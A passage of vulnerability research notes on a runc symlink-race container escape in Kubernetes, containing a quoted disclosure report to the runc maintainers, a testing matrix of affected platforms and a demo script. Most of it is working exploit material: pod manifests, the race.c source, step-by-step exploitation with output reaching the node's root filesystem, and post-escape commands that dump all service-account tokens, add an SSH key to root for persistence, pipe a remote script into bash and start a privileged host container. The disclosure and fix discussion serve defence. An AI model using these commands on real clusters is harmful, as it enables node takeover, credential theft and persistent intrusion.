"container_path": "/rootfs", "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/escape-volume" }, { "container_path": "/rootfs/host", "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/host-volume" }, { "container_path": "/var/run/secrets/kubernetes.io/serviceaccount", "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~secret/default-token-bxhkj", "readonly": true }, { "container_path": "/etc/hosts", "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/etc-hosts" }, { "container_path": "/dev/termination-log", "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/containers/1-exploit/c562dfbf" } ], "labels": { "io.kubernetes.container.name": "1-exploit", "io.kubernetes.pod.name": "exploit", "io.kubernetes.pod.namespace": "default", "io.kubernetes.pod.uid": "72c63ff5-05fd-465d-81c0-8bcfdd58edb3" }, "annotations": { "io.kubernetes.container.hash": "7a407414", "io.kubernetes.container.restartCount": "0", "io.kubernetes.container.terminationMessagePath": "/dev/termination-log", "io.kubernetes.container.terminationMessagePolicy": "File", "io.kubernetes.pod.terminationGracePeriod": "30" }, "log_path": "1-exploit/0.log", "linux": { "resources": { "cpu_period": 100000, "cpu_shares": 2, "oom_score_adj": 1000, "hugepage_limits": [ { "page_size": "1GB" }, { "page_size": "2MB" } ] }, "security_context": { "namespace_options": { "pid": 1 }, "run_as_user": {}, "masked_paths": [ "/proc/acpi", "/proc/kcore", "/proc/keys", "/proc/latency_stats", "/proc/timer_list", "/proc/timer_stats", "/proc/sched_debug", "/proc/scsi", "/sys/firmware" ], "readonly_paths": [ "/proc/asound", "/proc/bus", "/proc/fs", "/proc/irq", "/proc/sys", "/proc/sysrq-trigger" ] } } }, "runtimeSpec": { "ociVersion": "1.0.2-dev", "process": { "user": { "uid": 0, "gid": 0 }, "args": [ "sleep", "infinity" ], "env": [ "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", "HOSTNAME=exploit", "NGINX_VERSION=1.19.10", "NJS_VERSION=0.5.3", "PKG_RELEASE=1~buster", "KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1", "KUBERNETES_SERVICE_HOST=10.96.0.1", "KUBERNETES_SERVICE_PORT=443", "KUBERNETES_SERVICE_PORT_HTTPS=443", "KUBERNETES_PORT=tcp://10.96.0.1:443", "KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443", "KUBERNETES_PORT_443_TCP_PROTO=tcp", "KUBERNETES_PORT_443_TCP_PORT=443" ], "cwd": "/", "capabilities": { "bounding": [ "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW", "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE", "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE" ], "effective": [ "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW", "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE", "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE" ], "inheritable": [ "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW", "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE", "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE" ], "permitted": [ "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW", "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE", "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE" ] }, "oomScoreAdj": 1000 }, "root": { "path": "rootfs" }, "mounts": [ { "destination": "/proc", "type": "proc", "source": "proc", "options": [ "nosuid", "noexec", "nodev" ] }, { "destination": "/dev", "type": "tmpfs", "source": "tmpfs", "options": [ "nosuid", "strictatime", "mode=755", "size=65536k" ] }, { "destination": "/dev/pts", "type": "devpts", "source": "devpts", "options": [ "nosuid", "noexec", "newinstance", "ptmxmode=0666", "mode=0620", "gid=5" ] }, { "destination": "/dev/mqueue", "type": "mqueue", "source": "mqueue", "options": [ "nosuid", "noexec", "nodev" ] }, { "destination": "/sys", "type": "sysfs", "source": "sysfs", "options": [ "nosuid", "noexec", "nodev", "ro" ] }, { "destination": "/sys/fs/cgroup", "type": "cgroup", "source": "cgroup", "options": [ "nosuid", "noexec", "nodev", "relatime", "ro" ] }, { "destination": "/rootfs", "type": "bind", "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/escape-volume", "options": [ "rbind", "rprivate", "rw" ] }, { "destination": "/rootfs/host", "type": "bind", "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/host-volume", "options": [ "rbind", "rprivate", "rw" ] }, { "destination": "/etc/hosts", "type": "bind", "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/etc-hosts", "options": [ "rbind", "rprivate", "rw" ] }, { "destination": "/dev/termination-log", "type": "bind", "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/containers/1-exploit/c562dfbf", "options": [ "rbind", "rprivate", "rw" ] }, { "destination": "/etc/hostname", "type": "bind", "source": "/var/lib/containerd/io.containerd.grpc.v1.cri/sandboxes/f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8/hostname", "options": [ "rbind", "rprivate", "rw" ] }, { "destination": "/etc/resolv.conf", "type": "bind", "source": "/var/lib/containerd/io.containerd.grpc.v1.cri/sandboxes/f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8/resolv.conf", "options": [ "rbind", "rprivate", "rw" ] }, { "destination": "/dev/shm", "type": "bind", "source": "/run/containerd/io.containerd.grpc.v1.cri/sandboxes/f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8/shm", "options": [ "rbind", "rprivate", "rw" ] }, { "destination": "/var/run/secrets/kubernetes.io/serviceaccount", "type": "bind", "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~secret/default-token-bxhkj", "options": [ "rbind", "rprivate", "ro" ] } ], "annotations": { "io.kubernetes.cri.container-name": "1-exploit", "io.kubernetes.cri.container-type": "container", "io.kubernetes.cri.sandbox-id": "f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8" }, "linux": { "resources": { "devices": [ { "allow": false, "access": "rwm" } ], "memory": {}, "cpu": { "shares": 2, "period": 100000 } }, "cgroupsPath": "/kubelet/kubepods/besteffort/pod72c63ff5-05fd-465d-81c0-8bcfdd58edb3/addfd289b276936bb59fd81bedd5693d9bb5f486f19574cd392f621e9d2d5060", "namespaces": [ { "type": "pid" }, { "type": "ipc", "path": "/proc/2893298/ns/ipc" }, { "type": "uts", "path": "/proc/2893298/ns/uts" }, { "type": "mount" }, { "type": "network", "path": "/proc/2893298/ns/net" } ], "maskedPaths": [ "/proc/acpi", "/proc/kcore", "/proc/keys", "/proc/latency_stats", "/proc/timer_list", "/proc/timer_stats", "/proc/sched_debug", "/proc/scsi", "/sys/firmware" ], "readonlyPaths": [ "/proc/asound", "/proc/bus", "/proc/fs", "/proc/irq", "/proc/sys", "/proc/sysrq-trigger" ] } } } } ``` D: I've pushed an image with runc r95 baked in. You can use it like: This has k8s 1.20.7 containerd 1.5.2 and runc rc95. ``` kind create cluster --image=mauilion/node:runc95 ``` ## Testing Matrix: * Whatever makes sense for platform version * containerd --version * runc --version (rc94 and below is likely vulnerable) | Platform | Version | K8s | Containerd | Runc | Success | |---|---|---|---|---|---| | Kind | 0.10.0 | 1.20.2 | 1.4.0 | 1.0.0-rc92 | Yes | | Kind | 0.11.0 | 1.21.1 | 1.5.1 | 1.0.0-rc94 | Yes | | Kind | 0.11.0 | 1.20.7 | 1.5.2 | 1.0.0-rc95 | No | | Kind | 0.10.0 | 1.20.2 | 1.4.0 | 1.0.0-rc95+dev* | No | | Kubeadm | 1.21.1 | 1.21.1 | 1.4.4 | 1.0.0-rc93 | Yes | | GKE regular | 1.19.9-gke.1400 | 1.19.9 | 1.4.3 | 1.0.0-rc10 | Yes | | GKE alpha | 1.20.6-gke.1000 | 1.20.6 | 1.4.3 | 1.0.0-rc92 | Yes | | EKS | 1.19.8-eks-96780e | 1.19.8 | 1.4.1 | 1.0.0-rc92 | Yes** | | AKS | regular | 1.19.9 | 1.4.4+azure | 1.0.0-rc92 | Yes | | Civo | latest | v1.20.0-k3s1 | 1.4.3-k3s1 | 1.0.0-rc92 | Yes | | RKE1 | 1.2.8 | 1.20.6 | 1.4.4 | 1.0.0-rc93 | Yes | \* Compiled runc by hand from HEAD on 5/23 \** Custom AMI: ami-01ac4896bf23dcbf7 us-east-2 (amazon-eks-node-1.19-v20210512) and earlier --- Etienne's original report Hello runc maintainers, When mounting a volume, runc trusts the source, and will follow symlinks, but it doesn't trust the target argument and will use 'filepath-securejoin' library to resolve any symlink and ensure the resolved target stays inside the container root. As explained in SecureJoinVFS documentation (https://github.com/cyphar/filepath-securejoin/blob/40f9fc27fba074f2e2eebb3f74456b4c4939f4da/join.go#L57), using this function is only safe if you know that the checked file is not going to be replaced by a symlink, the problem is that we can replace it by a symlink. In K8S there is a trivial way to control the target, create a pod with multiple containers sharing some volumes, one with a correct image, and the other ones with non existing images so they don't start right away. Let's start with the POC first and the explanations after # Create our attack POD > > kubectl create -f - <<EOF > apiVersion: v1 > kind: Pod > metadata: > name: attack > spec: > terminationGracePeriodSeconds: 1 > containers: > - name: c1 > image: ubuntu:latest > command: [ "/bin/sleep", "inf" ] > env: > - name: MY_POD_UID > valueFrom: > fieldRef: > fieldPath: metadata.uid > volumeMounts: > - name: test1 > mountPath: /test1 > - name: test2 > mountPath: /test2 > $(for c in {2..20}; do > cat <<EOC > - name: c$c > image: donotexists.com/do/not:exist > command: [ "/bin/sleep", "inf" ] > volumeMounts: > - name: test1 > mountPath: /test1 > $(for m in {1..4}; do > cat <<EOM > - name: test2 > mountPath: /test1/mnt$m > EOM > done > ) > - name: test2 > mountPath: /test1/zzz > EOC > done > ) > volumes: > - name: test1 > emptyDir: > medium: "Memory" > - name: test2 > emptyDir: > medium: "Memory" > EOF # Compile race.c (see attachment, simple binary running renameat2(dir,symlink,RENAME_EXCHANGE)) > > gcc race.c -O3 -o race # Wait for the container c1 to start, upload the 'race' binary to it, and exec bash > > sleep 30 # wait for the first container to start > kubectl cp race -c c1 attack:/test1/ > kubectl exec -ti pod/attack -c c1 -- bash # you now have a shell in container c1 # Create the following symlink (explanations later) > > ln -s / /test2/test2 # Launch 'race' multiple times to try to exploit this TOCTOU > > cd test1 > seq 1 4 | xargs -n1 -P4 -I{} ./race mnt{} mnt-tmp{} /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/ # Now that everything is ready, in a second shell, update the images so that the other containers can start > > for c in {2..20}; do > kubectl set image pod attack c$c=ubuntu:latest > done # Wait a bit and look at the results > > for c in {2..20}; do > echo ~~ Container c$c ~~ > kubectl exec -ti pod/attack -c c$c -- ls /test1/zzz > done > > ~~ Container c2 ~~ > test2 > ~~ Container c3 ~~ > test2 > ~~ Container c4 ~~ > test2 > ~~ Container c5 ~~ > bin dev home lib64 mnt postinst root sbin tmp var > boot etc lib lost+found opt proc run sys usr > ~~ Container c6 ~~ > bin dev home lib64 mnt postinst root sbin tmp var > boot etc lib lost+found opt proc run sys usr > ~~ Container c7 ~~ > error: unable to upgrade connection: container not found ("c7") > ~~ Container c8 ~~ > test2 > ~~ Container c9 ~~ > bin boot dev etc home lib lib64 lost+found mnt opt postinst proc root run sbin sys tmp usr var > ~~ Container c10 ~~ > test2 > ~~ Container c11 ~~ > bin dev home lib64 mnt postinst root sbin tmp var > boot etc lib lost+found opt proc run sys usr > ~~ Container c12 ~~ > test2 > ~~ Container c13 ~~ > test2 > ~~ Container c14 ~~ > test2 > ~~ Container c15 ~~ > bin boot dev etc home lib lib64 lost+found mnt opt postinst proc root run sbin sys tmp usr var > ~~ Container c16 ~~ > error: unable to upgrade connection: container not found ("c16") > ~~ Container c17 ~~ > error: unable to upgrade connection: container not found ("c17") > ~~ Container c18 ~~ > bin boot dev etc home lib lib64 lost+found mnt opt postinst proc root run sbin sys tmp usr var > ~~ Container c19 ~~ > error: unable to upgrade connection: container not found ("c19") > ~~ Container c20 ~~ > test2 On my first try I had 6 containers where /test1/zzz was / on the node, some failed to start, and the remaining were not affected. Even without the ability to update images, we could use a fast registry for c1 and a slow registry or big container for c2+, we just need c1 to start 1sec before the others. Tests were done on the following GKE cluster: > > gcloud beta container --project "delta-array-282919" clusters create "toctou" --zone "us-central1-c" --no-enable-basic-auth --cluster-version "1.18.12-gke.1200" --release-channel "rapid" --machine-type "e2-medium" --image-type "COS_CONTAINERD" --disk-type "pd-standard" --disk-size "100" --metadata disable-legacy-endpoints=true --scopes "https://www.googleapis.com/auth/devstorage.read_only","https://www.googleapis.com/auth/logging.write","https://www.googleapis.com/auth/monitoring","https://www.googleapis.com/auth/servicecontrol","https://www.googleapis.com/auth/service.management.readonly","https://www.googleapis.com/auth/trace.append" --num-nodes "3" --enable-stackdriver-kubernetes --enable-ip-alias --network "projects/delta-array-282919/global/networks/default" --subnetwork "projects/delta-array-282919/regions/us-central1/subnetworks/default" --default-max-pods-per-node "110" --no-enable-master-authorized-networks --addons HorizontalPodAutoscaling,HttpLoadBalancing --enable-autoupgrade --enable-autorepair --max-surge-upgrade 1 --max-unavailable-upgrade 0 --enable-shielded-nodes K8S 1.18.12, containerd 1.4.1, runc 1.0.0-rc10, 2 vCPUs I haven't dug too deep in the code and relied on strace to understand what was happening, and I did the investigation maybe a month ago so details are fuzzy but here is my understanding 1) K8S prepares all the volumes for the pod in /var/lib/kubelet/pods/$MY_POD_UID/volumes/VOLUME-TYPE/VOLUME-NAME (the fact that the paths are known definitely helps this attack) 2) containerd prepares the rootfs at /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs 3) runc calls unshare(CLONE_NEWNS), thus preventing the following mount operations to affect other containers or the node directly 4) runc mount bind the K8S volumes 4.1) runc call securejoin.SecureJoin to resolve the destination/target 4.2) runc call mount() K8S doesn't give us control over the mount source, but we have full control over the target of the mounts, so the trick is to mount a directory containing a symlink over K8S volumes path to have the next mount use this new source, and give us access to the node root filesystem. From the node the filesystem look like this > > /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt1 > /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt-tmp1 -> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/ > /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt2 -> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/ > /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt-tmp2 > ... > /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2/test2 -> / our 'race' binary is constantly swapping mntX and mnt-tmpX, when c2+ start, they do the following mounts mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mntX) If we are lucky, when we call SecureJoin mntX is a directory, and when we call mount mntX is a symlink, and as mount follow symlinks, this gives us mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/) The filesystem now look like > > /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt1/ > /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt-tmp1 -> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/ > /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt2 -> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/ > /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt-tmp2/ > ... > /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2 -> / When we do the final mount mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/zzz) becomes mount(/, /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mntX) And we now have full access to the whole node root, including /dev, /proc, all the tmpfs and overlay of other containers, everything :) A possible fix is to replace secureJoin with the same approach as used to fix K8S subpath vulnerability: https://kubernetes.io/blog/2018/04/04/fixing-subpath-volume-vulnerability/#the-solution openat() files one by one disabling symlink, manually follow symlink, check if we are still in container root at the end, and then mount bind /proc/<runc pid>/fd/<final fd> If I understand correctly, crun either uses openat2() or some manual resolution (such as secureJoin) followed by a check of openat(/proc/self/fd/...) so I think they are safe. Haven't checked any other runtime. #### race.c ``` #define _GNU_SOURCE #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/stat.h> #include <unistd.h> #include <sys/syscall.h> int main(int argc, char *argv[]) { if (argc != 4) { fprintf(stderr, "Usage: %s name1 name2 linkdest\n", argv[0]); exit(EXIT_FAILURE); } char *name1 = argv[1]; char *name2 = argv[2]; char *linkdest = argv[3]; int dirfd = open(".", O_DIRECTORY|O_CLOEXEC); if (dirfd < 0) { perror("Error open CWD"); exit(EXIT_FAILURE); } if (mkdir(name1, 0755) < 0) { perror("mkdir failed"); //do not exit } if (symlink(linkdest, name2) < 0) { perror("symlink failed"); //do not exit } while (1) { renameat2(dirfd, name1, dirfd, name2, RENAME_EXCHANGE); } } ``` # DEMO SCRIPT ```bash #!/usr/bin/env bash # honk.sh # 0. Set up a minikube with runC less than rc94 # 1. Run the real thing and get it to "win" # 2. Modify BASEHASH, WINHASH, and WINHONK accordingly # 3. Run ./honk.sh BASEHASH="honk-68b95d5858" # The pod that won WINHASH="$BASEHASH-8k6tr" # The number of the n-honk container that won WINHONK="5" # "n" corresponds to "n-honk" TRYSLEEP="1.6" ######################## # include the magic ######################## . lib/demo-magic.sh TYPE_SPEED=23 clear echo "" p "# We have RBAC access to create daemonsets, deployments, and\n pods in the default namespace of a 1.20.2 cluster:" kubectx minikube 2> /dev/null 1> /dev/null pe "kubectl version --short=true | grep Server" pe "kubectl get nodes" p "kubectl get pods --all-namespaces" kubectl get pods --all-namespaces | grep -v " honk-" p "# The worker nodes are running a vulnerable version of runC" p "runc --version" docker exec -it minikube runc --version clear p "# Unleash the honks 🦢🦢🦢🦢!!!!" p "curl -L http://git.io/honk-symlink.sh | REPLICAS=10 bash" echo "staging the nginx:stable image with a daemonset" sleep 1.4 echo "daemonset.apps/honk-stage created" sleep 0.7 echo "waiting for the image staging" sleep 1.5 echo "Succeeded" sleep 0.3 echo "Deploying the honk deployment." sleep 0.5 echo "deployment.apps/honk created" sleep 0.2 echo "Waiting for things to deploy for 5 seconds before starting" sleep 5.2 ATTEMPTS=1 while [ $ATTEMPTS -le 10 ]; do for POD in 592sn 5cbj5 8l8z6 98h9c 9hlgw jjmqb ngslb nmqqg pbf2t a1312; do echo "attempt $ATTEMPTS" COUNTER=1 while [ $COUNTER -le 5 ]; do sleep 0.2 echo -n "Checking pod/$BASEHASH-$POD $COUNTER-honk for the host mount..." sleep $TRYSLEEP echo "nope." let COUNTER=$COUNTER+1 sleep 0.1 done echo "pod/$BASEHASH-$POD force deleted" let ATTEMPTS=$ATTEMPTS+1 done done echo "attempt 11" COUNTER=1 while [ $COUNTER -le 5 ]; do sleep 0.3 echo -n "Checking pod/$WINHASH $COUNTER-honk for the host mount..." sleep $TRYSLEEP if [ $COUNTER -eq $WINHONK ]; then echo "SUCCESS after 11 attempts! Run:" echo "kubectl exec -it $WINHASH -c $WINHONK-honk -- bash" exit 0 else echo "nope." fi let COUNTER=$COUNTER+1 done exit ###### ## Demo commands hostname # container's ip a # container's ps -ef # host's kill # but can't kill # Steal all mounted secrets in pods running on this node find /var/lib/kubelet/pods/*/volumes/kubernetes.io~secret/*/token -print -exec cat {} \; # Modify/add static pod manifest to get kubelet to run anything you want ls /etc/kubernetes/manifests/ # Add an SSH key for persistence mkdir -p /root/.ssh echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDOfpWd+R+XDteC89yiFPxf7h7p/d/v+RT5CFK1pMJ9sTE//eQqTVIiHXBNDTyTfXP7dK/VUs5wBbenDtZNKCKrHNlVjKWAIkUvVfxCP3tocubq+ydGmOwrR9FDKk1Otd525FXI3Nip66DlvAGydUD5VgIhsLvi+qNV/Wh7hFhTMnBDvGhl7MsXfM+tNlF6X+EPz3sJ42z4M9nn42NAjYTQTl4jnDhhmgBBE0q+VXKPIOPd2hXXFy2w9/YJrmuFdSpRTaEgIsG17XcTY852UULzeKaVSBFBtZvlxrag4u/yF1dJPPg5EcxA7UjbzSVPAht1BwHULPbRyDr1ttutiBOZ" >> /root/.ssh/authorized_keys # Interact with docker docker ps # Run am I contained and notice some limitations curl -fsSL "https://github.com/genuinetools/amicontained/releases/download/v0.4.9/amicontained-linux-amd64" -o "/usr/local/bin/amicontained" && chmod a+x "/usr/local/bin/amicontained" amicontained # Leverage docker to run a fully privileged container and exec into it docker run --privileged --net=host --pid=host --volume /:/host -it nginx:stable chroot /host /bin/bash # Rerun hostname # host's ip a # host's ps -ef # host's kill # Now we can kill processes # Run am I contained and notice we aren't limited anymore curl -fsSL "https://github.com/genuinetools/amicontained/releases/download/v0.4.9/amicontained-linux-amd64" -o "/usr/local/bin/amicontained" && chmod a+x "/usr/local/bin/amicontained" amicontained exit ########### # Cleanup # ########### # kubectl delete ds --all # kubectl delete deploy --all # kubectl delete po --all --grace-period=0 --force ```